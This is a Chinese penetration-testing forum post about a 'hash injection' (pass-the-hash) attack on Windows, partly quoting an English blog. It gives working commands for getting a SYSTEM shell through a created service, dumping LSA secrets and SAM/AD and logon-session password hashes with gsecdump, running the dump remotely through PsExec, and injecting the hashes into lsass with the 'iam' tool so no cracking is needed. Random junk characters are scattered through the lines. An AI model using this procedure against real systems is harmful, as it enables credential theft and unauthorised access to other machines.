找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 HASH注入式攻击
返回列表 发新帖
查看: 2630|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:4 J. X( _: J* E/ @# H
8 T' x/ M) Z/ }
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact( u, U+ C4 n) p4 a% }- L
[SC] CreateService SUCCESS/ }. C0 P5 r3 ]9 f& r5 y5 L* R' ^

# _5 F4 P( @* h& a' GC:\>sc start shellcmdline7 O. d2 u& C5 P; `2 S# g
[SC] StartService FAILED 1053:
  Q0 D$ i! @: u, L+ t% V8 t- S) t  }+ x! z; P+ p5 B
The service did not respond to the start or control request in a timely fashion.* r. M3 Q! B. d: l1 k2 j% g

2 F# S4 i) R' ^3 d+ oC:\>sc delete shellcmdline
9 `2 c# f8 K1 z7 a. f" y! ^$ A[SC] DeleteService SUCCESS$ F3 O) u! W+ H4 v

, A/ G& Q( E# @------------! c& |% H- v( U, i/ O4 f  n/ o) o* k, B
- n* g& c! l0 N+ c# m
Then in the new DOS window:4 o- r8 N6 Z/ N3 }0 j
' u' n/ U& \  t" f$ v. l7 f1 n: A
Microsoft Windows XP [Version 5.1.2600]
) _) W. R; |- o7 x0 P5 I5 L5 M; Q(C) Copyright 1985-2001 Microsoft Corp.
- [0 V' ]& a, U) N+ N" H
" \# j7 O7 @6 t0 B  B4 tC:\WINDOWS\system32>whoami
, T6 u# q5 k4 m4 G. a5 f2 ~NT AUTHORITY\SYSTEM
6 `- o$ z, ^! B9 i$ S$ G) X8 r$ v1 P2 g. e0 p1 h- N9 j8 M; p
C:\WINDOWS\system32>gsecdump -h
- Y9 e4 j. g, b% X: e7 d3 ~gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)/ g  {! p7 J" `
usage: gsecdump [options]
3 J  n. F" \; M# O) j
: P! Z7 J. P) P. i) {  eoptions:" @+ G+ Y& _: u
-h [ --help ] show help
' p2 @! |0 z/ W, p5 x0 P7 m-a [ --dump_all ] dump all secrets
1 W$ c0 v# \1 c( Q6 s. `& i-l [ --dump_lsa ] dump lsa secrets4 O; }0 c  {9 B% H
-w [ --dump_wireless ] dump microsoft wireless connections. _. c& s* w! T1 K6 \) n9 j. ^
-u [ --dump_usedhashes ] dump hashes from active logon sessions4 h/ x/ V0 J1 Q) k0 P
-s [ --dump_hashes ] dump hashes from SAM/AD
4 F9 w2 k% F- P! E! r( f7 P& [8 s) q
Although I like to use:7 u' Q: e1 J) h' j' H1 j/ \9 Z8 m
' ^+ v5 j1 F  {8 P2 S. N, e: p* J4 O: F
PsExec v1.83 - Execute processes remotely1 \9 Y9 L1 ]4 X  O& X
Copyright (C) 2001-2007 Mark Russinovich
9 x( L0 m# X) ^1 t$ c1 q9 F& SSysinternals - 链接标记[url]www.sysinternals.com[/url]" H8 B. J2 {3 g9 N0 L. ~7 y
+ d) D. \0 z# G: C) w1 _( W4 L
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
3 \, _8 I" X2 X( H  G  R  m* n# K6 S
to get the hashes from active logon sessions of a remote system.( K# o# A1 K0 G8 O8 j; c

- A  [2 r; e1 M6 I# K! a- nThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
) A& g$ A8 E7 K3 C8 S) @! p: k% H& h# T, ?% b. g
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.+ v+ R9 J1 v( H5 W' S! ?- U
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]- _; A! c' t( `9 S5 b& r+ Q
: ]' A! N9 }- q
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
4 W. {/ z( n  V/ q
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表